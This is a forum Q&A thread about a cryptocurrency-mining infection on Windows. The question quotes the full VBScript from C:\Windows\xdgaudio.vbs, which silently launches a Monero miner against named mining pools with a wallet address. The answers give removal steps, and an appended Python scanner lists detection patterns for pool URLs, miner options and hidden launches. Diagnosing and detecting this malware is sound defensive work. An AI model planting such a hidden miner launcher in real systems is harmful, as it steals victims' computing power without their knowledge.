-6

Windows Script Host error.

The contents of C:\Windows\xdgaudio.vbs are as follows.

Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing

I have attached a picture of the error; please take a look and give me a solution.


Hamza Anis
Helping Koushik

2 Answers

2

Figured it out!! Short answer: Delete "servicecrsssr.vbs" file from your Windows directory, then reboot. (I actually PULLED THE PLUG, despite the danger of file loss/corruption, to avoid the possibility of the program attempting to rewrite any offending files during the shutdown process.)

A number of other files are involved, but upon deleting (or renaming) the file above and rebooting all was well... no evidence of the mining process running. I caught this virus on TWO of my test computers. These were the only computers I connected my customer's infected drive to via USB. It's STILL a mystery exactly how this thing propagates! The other files which seemed to be involved were:

\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf

The *.pf file rewrites itself with new random characters in place of the "x"'s if you rename or delete it and reboot - with no ill effect that I can determine. On my first infected machine, I renamed ALL of the files above, rebooting after renaming each one. The last file I tried was "servicecrsssr.vbs". On the second infected test machine, I only renamed the "servicecrsssr.vbs" file and rebooted, then all was well. Please let me know how this works out for you. Thanks!

LREmery
0

It is indeed a bitcoin miner. Thankfully, it's a fairly crappy one, very obvious, and no more malicious than to run a background process. Neither of the anti-virus/malware apps I run picked it up, though. Mine was found in a game the kids downloaded, packed in a setup file.

Anti-virus programs should have picked this up easily; vbs and batch files are so obvious. Malwarebytes eventually complained about the actual miner .exe file that they call, but only after it was running.
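
The second answer notes that the .vbs and batch launchers are easy to recognise. As an added example (not code from the question or either answer), this Python sketch flags script files containing a Stratum pool URL, miner options from the question's command line, or a hidden `WShell.Run ..., 0` launch. The function names, the "suspicious" rule and the sample text with its placeholder wallet are assumptions made here.

```python
import re
from pathlib import Path

# Pool endpoints such as stratum+tcp://host:port
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([A-Za-z0-9.-]+):(\d{1,5})", re.I)
# Miner options that appear in the question's command line
FLAG_RE = re.compile(
    r"(?<!\S)(--donate-level|--cpu-priority|--cpu-affinity|--threads"
    r"|-a\s+cryptonight)\b", re.I)
# WScript.Shell Run call with window style 0, i.e. no visible window
HIDDEN_RUN_RE = re.compile(r"\.Run\s*\(?\s*\"[^\r\n]*\"\s*,\s*0\b", re.I)

# Constructed samples modelled on the question's script (wallet is a placeholder)
SAMPLE_VBS = '''Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 --threads 16 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u WALLET_PLACEHOLDER -p x", 0
Set WShell = Nothing
'''
SAMPLE_BENIGN = 'Set sh = CreateObject("WScript.Shell")\nsh.Run "notepad.exe", 1\n'

def scan_script(text):
    """Return the miner indicators found in one script's text."""
    pools = sorted({(h.lower(), int(p)) for h, p in STRATUM_RE.findall(text)})
    flags = sorted({re.sub(r"\s+", " ", f.lower()) for f in FLAG_RE.findall(text)})
    hidden = bool(HIDDEN_RUN_RE.search(text))
    # Assumed rule: any pool URL, or two or more miner options, is worth a look
    return {"pools": pools, "flags": flags, "hidden_run": hidden,
            "suspicious": bool(pools) or len(flags) >= 2}

def scan_dir(root, exts=(".vbs", ".bat", ".cmd")):
    """Scan script files directly under root; return {path: findings} for hits."""
    hits = {}
    for path in Path(root).iterdir():
        if not (path.is_file() and path.suffix.lower() in exts):
            continue
        try:
            raw = path.read_bytes()
        except OSError:
            continue  # unreadable or locked file: skip it
        # Windows scripts are sometimes saved as UTF-16 with a byte-order mark
        enc = "utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
        found = scan_script(raw.decode(enc, errors="replace"))
        if found["suspicious"]:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    import sys
    print(scan_script(SAMPLE_VBS))
    for path, found in scan_dir(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, found)
```

Passing a directory such as C:\Windows as the first argument lists the script files that match; a hit is a lead for manual review, not proof of infection.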